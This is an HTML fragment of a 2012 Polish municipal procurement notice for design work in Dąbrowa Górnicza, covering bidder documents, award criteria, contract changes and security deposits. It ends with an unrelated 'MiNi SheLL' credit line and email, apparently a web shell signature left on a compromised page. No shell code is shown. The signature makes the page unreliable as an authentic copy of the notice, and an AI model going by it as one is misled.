<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2.   Wycena ofertowa - załącznik nr 2 do SIWZ (wskazana data podpisania);
3. Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w  formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
4. Zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b Ustawy, które  musi zawierać minimum: 
4.1.dane pozwalające na identyfikacje stron, 
4.2.	zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych  do wykonania zamówienia i sytuacji  finansowej) oraz jego podstawa (np. umowa przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo, o współpracy, porozumienie o delegowaniu pracowników, umowa oświadczenie usług doradczych, know-how i inne umowy nienazwane), 
4.3.	cel i czas udostępnienia (obejmujący okres realizacji zamówienia);
5.   Potwierdzenie wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1.w zakresie zmiany terminów realizacji zamówienia, ujętych w umowie oraz harmonogramie rzecz. finanse. realizacji prac, na skutek (przyczyn nie leżących po stronie Wykonawcy):
1.1. zmiany przepisów prawa, co powoduje konieczność dostosowania dokumentacji do zmiany 	przepisów, które nastąpiły w trakcie realizacji zamówienia, 
1.2. konieczność wykonania zamówień dodatkowych, o których mowa w art. 67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania zamówienia wraz ze 	wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
1.3.nie dotrzymania wstępnego przyrzeczenia przez właścicieli nieruchomości, przez którą przebiega planowana inwestycja, co powoduje konieczność przeprojektowania; 
1.4.braku prawa do dysponowania terenem, 
1.5.niezawinionych przez Wykonawcę opóźnień w uzyskaniu wymaganych pozwoleń, uzgodnień, decyzji lub opinii  organów, niezbędnych do uzyskania pozwolenia na budowę.
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów,
2.2. zmiany obowiązujących przepisów prawa istotnych dla postanowień zawartej umowy,
2.3. rezygnacja Zamawiającego z całości lub części zamówienia
2.4. zmiany podatku VAT na skutek zmian w przepisach prawnych, przy czym:
a) w przypadku zwiększenia stawki podatku VAT: ceny ofertowe netto nie mogą być wyższe niż zadeklarowane w wycenie ofertowej. Wartość wynagrodzenia brutto nie ulegnie zmianie w okresie obowiązywania umowy.
b) w przypadku zmniejszenia stawki podatku VAT: ceny ofertowe netto nie mogą być wyższe niż zadeklarowane w wycenie ofertowej. Wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
2.5. zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca,
2.6. zmiany osób wykonujących zamówienie na skutek zdarzeń losowych, zmian kadrowo-personalnych, utraty wymaganych uprawnień, nie wywiązywania się osób wykonujących zamówienie z obowiązków wynikających z powierzonych im zadań, utraty stanowiska, z zastrzeżeniem równoważności uprawnień
        3. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 25.4. SIWZ Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o  dokonanie wskazanej zmiany.
4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół 
podpisany przez obie strony.
5. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie
strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie
faktyczne i prawne.
6.  Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej
jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
  7. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ
-  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Inwestycji Miejskich, piętro 2, pokój 222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2012 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Inwestycji Miejskich, piętro 2, pokój 222.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finasowane ze środków Unii Europejskiej. 2. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie.
Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. 
Zabezpieczenie może być wnoszone w jednej lub kilku formach, zgodnie z dyspozycją Art. 148 ust.1 Ustawy.   
Zabezpieczenie wnoszone w formie pieniężnej powinno zostać wpłacone nie później niż w dniu podpisania umowy na rachunek bankowy Zamawiającego:
Getin Noble Bank S.A. - konto nr 74 1560 1010 0000 9480 0001 1847 
Skuteczne wniesienie zabezpieczenia należytego wykonania umowy w formie pieniężnej następuje z chwilą wpływu środków pieniężnych na ww. rachunek Zamawiającego
Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.
	Zamawiający zwraca zabezpieczenie w wysokości 70% w terminie 30 dni od dnia wykonania zamówienia potwierdzonego końcowym  protokołem zdawczo -odbiorczym podpisanym przez obie strony  oraz po uzyskaniu w imieniu Zamawiającego  decyzji o pozwoleniu na budowę.
	Kwota pozostawiona na zabezpieczenie roszczeń z tytułu należytego wykonania umowy wyniesie 30 % wysokości zabezpieczenia. Kwota ta zostanie zwrócona nie później niż w 15 dniu po upływie 36 miesięcy od dnia uzyskania pozwolenia na budowę.
3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8  SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi 
w punkcie 9 SIWZ.
3.W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
       	lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione 	w pkt. 9.2. SIWZ przez każdego z nich.
Dokumenty i oświadczenia wymienione w pkt. 9.1.2. do 9.1.4. SIWZ Wykonawcy składają wspólnie, przy czym w przypadku polisy Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, Formularz ofertowy wymieniony w pkt. 9.3.1. oraz Wycenę ofertową wymieniona w pkt 9.3.2. SIWZ SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców.
        Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
           	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
4.Termin rozpoczęcia prac nastąpi z dniem podpisania umowy.  
         4.1.  Termin zakończenia prac projektowych nastąpi: nie później niż do 29 marca 2013r. 
       4.2. Termin obowiązywania umowy: do 4 lat od daty zawarcia umowy.

5. Szczegóły  dotyczące nadzorów autorskich zawiera załącznik nr 2 a do SIWZ.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com